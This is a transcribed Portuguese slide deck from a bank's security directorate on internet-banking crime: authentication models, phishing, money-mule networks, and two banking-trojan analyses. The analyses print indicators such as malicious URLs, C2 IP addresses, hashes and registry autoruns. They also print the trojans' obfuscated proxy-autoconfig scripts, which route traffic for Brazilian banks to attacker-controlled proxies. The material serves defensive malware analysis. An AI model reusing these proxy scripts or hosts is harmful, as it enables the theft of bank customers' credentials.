Laerte Peotta

Transcrição

Laerte Peotta

Laerte Peotta – [email protected]
Diretoria de Gestão da Segurança
ANÁLISE DE CRIMES DE INFORMÁTICA SOB A
ÓTICA DE UMA INSTITUIÇÃO FINANCEIRA
Laerte Peotta [email protected]
OBJETIVOS
Apresentar os modelos de segurança
atualmente utilizados pelos bancos
brasileiros e perspectivas para o futuro.
 Apresentar os modelos de ataques e o
modus operandi dos criminosos.

NÚMEROS 2011
R$ 18 bilhões em investimento (+27% 2009);
 42 milhões de contas correntes com Internet
Banking (+11% 2010);
 24% das transações (+20% 2010);

NÚMEROS 2011

Previsão:5 a 7 anos mobile banking terá a
mesma relevância do internet banking;
PILARES DA AUTENTICAÇÃO
O que se sabe (senha, credencial);
 O que se tem (Certificado digital, token);
 O que se é (Biometria: íris, palma, digitação);
 Onde se está (posicionamento global).

MODELOS DE SEGURANÇA E-BANK
Modelos de Segurança e-bank
FORÇA DOS MODELOS ATUAIS
A força de um criptosistema é dada pelo
tempo t e pelo tamanho da chave n (t/2^n).
 Um computador capaz de executar 10^9
ciclos/segundo precisaria de 35 anos para
quebrar uma chave de n=60bits.

TIPOS PRINCIPAIS DE ATAQUES

Elo Fraco:
 Humano;
 Computador.
TIPOS PRINCIPAIS DE ATAQUES
SPAMS
MALWARES – TROJAN BANKING
ATAQUES
Controle;
 Personificação.

ATAQUE DE CONTROLE
ATAQUE DE PERSONIFICAÇÃO
PHISHING
PÁGINA FALSA
ANÁLISE TROJAN 1

URL: http://worshipnmusic.net/wp-content/themes/sakura/plugins/wootumblog/functions/cache/readme.php

Hashes (MD5):
93190970dd469ce49bb19ebb5f3d2009 Recadastramento_de_Titulo.exe






Arquivos criados/acessados:
C:\Documents and Settings\usuario\Dados de
aplicativos\Recadastramento_de_Titulo.exe
C:\Documents and Settings\usuario\Dados de aplicativos\x12.txt
C:\Documents and Settings\usuario\Desktop\Recadastramento_de_Titulo.exe
Alvos: BANESPA BB BRADESCO CEF CITIBANK ITAU SAFRA SANTANDER
SERASA SHOP FACIL SICREDI
ANÁLISE TROJAN 1









GET
http://187.109.161.79/
http://187.109.161.79/centro.txt
http://187.109.167.31/contagem.php
http://187.109.167.31/NOTICE/
POST
http://187.109.167.31/NOTICE/
Email: [email protected] [email protected]
Proxy no IE:: AutoConfigURL SZ
http://187.109.161.79
ANÁLISE TROJAN 1











function FindProxyForURL(url, host)
{
var a = "P";
var b = "R";
var v = "O";
var f = "X";
var s = "Y";
var SERVER = "P"+""+"R"+""+"O"+""+"X"+""+"Y"+""+"
"+""+"187"+""+"."+""+"109"+""+"."+""+"167"+""+"."+""+"31"+""+":"+""+"8"+
""+"0";
if (shExpMatch(host, "b"+"b.c"+"om.b"+""+"r")) {
return SERVER;
}
ANÁLISE TROJAN 2

URL: http://avisos8.foto-brasil-host.info/

Hashes (MD5):
2517b5da22104857c8266df762d60139 taskman.exe
853073b13439eb96786e2f5cd482ecb7 wins.exe
94a41b5a8c884ec2b303adfc1be82c8e index.html.exe
9e1e5883c74742a497cf5c272ccd2321 ok.db
a25b90f89a54ddfb2835f4504e5e1866 VENDAS.txt











Arquivos criados/acessados:
C:\Documents and Settings\cleosvaldo\Configurações locais\Temp\ok.db
C:\Documents and Settings\cleosvaldo\Configurações locais\Temp\VENDAS.txt
C:\Documents and Settings\cleosvaldo\Configurações locais\Temp\wins.exe
C:\Documents and Settings\cleosvaldo\Desktop\index.html.exe
C:\WINDOWS\taskman.exe
ANÁLISE TROJAN 2

Alvos: BB Banese banespa Banrisul BNB Bradesco CEF
Citibank HSBC Itaú Safra Santander Sicredi

GET
http://vks11466.ip-37-59-121.eu/msn/cleosvaldo-VENDAS
http://176.31.106.190/aapf/login/index.php
http://176.31.106.190/bb/portalbb/home29,116,116,1,1,1,1.h
tml



ANÁLISE TROJAN 2





POST
http://176.31.106.190/aapf/login/index.php
http://176.31.106.190/bb/portalbb/home29,116,116,1,1,1,1.html
Banco de Dados SQL
176.31.106.190:80 [AP] GET
http://www.bb.com.br/aapf/login/images/bt_limpar.png HTTP/1.0 Accept:
*/* Referer:
http://www.bb.com.br/aapf/login/passo2.php?id=201.11.144.171
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Language: pt-br User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0) Proxy-Connection: Keep-Alive Host:
www.bb.com.br
ANÁLISE TROJAN 2






autoruns:
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Userinit","C:\DOCUME~1\CLEOSV~1\CO
NFIG~1\Temp\crss.exe",enabled,"","","File not found:
C:\DOCUME~1\CLEOSV~1\CONFIG~1\Temp\crss.exe","C:\DOCUME~
1\CLEOSV~1\CONFIG~1\Temp\crss.exe"
Proxy no IE:
AutoConfigURL SZ
file://C:\DOCUME~1\CLEOSV~1\CONFIG~1\Temp/VENDAS.txt
Proxy no Firefox:
network.proxy.autoconfig_url
file:///C:/DOCUME~1/CLEOSV~1/CONFIG~1/Temp/VENDAS.txt
ANÁLISE TROJAN 2

var _0x8089=["PROXY
oi.walmor.org:80","*bb*","*bancodobrasil*","*banese*","*cef*"
,"*caixa*","*bradesco*","*hsbc*","*hotmail*","*santander*","*r
eal*","*banespa*","*sicredi*","*itau*","*bnb*","*safra*","*banri
sul*","*citibank*","*cetelem*","*pagseguro*","*intouch*","*inf
oseg*","*serasa*","*american*","*paypal*","*linhadefensiva*"
,"br","com","*securessl*","*gmail*","*tam.com*","DIRECT
ANÁLISE TROJAN - ACESSOS
MODELO DE ATAQUE CENTRALIZADO
MATERIALIDADE
Ganhe dinheiro trabalhando em casa.
Garantia de lucro. (laranja)
 Identificação de autoria e ato ilícito.

 IP;
 SO;
 Computador;
 Outros
acessos.
MATERIALIDADE - ESTRUTURA
Controle
Desenvolvedor
Spammer
Aliciador
Laranja
Despachante
Inocente
Criminoso
Pagador
Comprador
FUTURO
Paradigmas de Identificação e Autorização
segura e eficiente de clientes e-Bank;
 Autenticação out-of-band;
 Identificação e desarticulação de grupos
criminosos;
 Colaboração com agentes da lei
(tentáculos).

LAERTE PEOTTA – [email protected]
DIRETORIA DE GESTÃO DA SEGURANÇA

Laerte Peotta

Transcrição

Documentos relacionados

IBSTracker Advanced - Liberações para Comunicação

Layout - Procedimentos

CORPO DO EMAIL **** Você recebeu um Emotioncard

O windows não consegue encontrar "csrcs.exe"

USBInterface - Sua porta de acesso ao hardware de PC

INVESTIGAÇÃO RÁPIDA DE CAVALOS DE TRÓIA

programas úteis escondidos no windows

v.igo.t

SOLUÇÕES AVANÇADAS DE TRATAMENTO DE ÁGUA

Configuração do Proxy no Mozilla Firefox 1 - Multiweb

analise de malware - Fernando Bracalente

GRIS-2011-A-004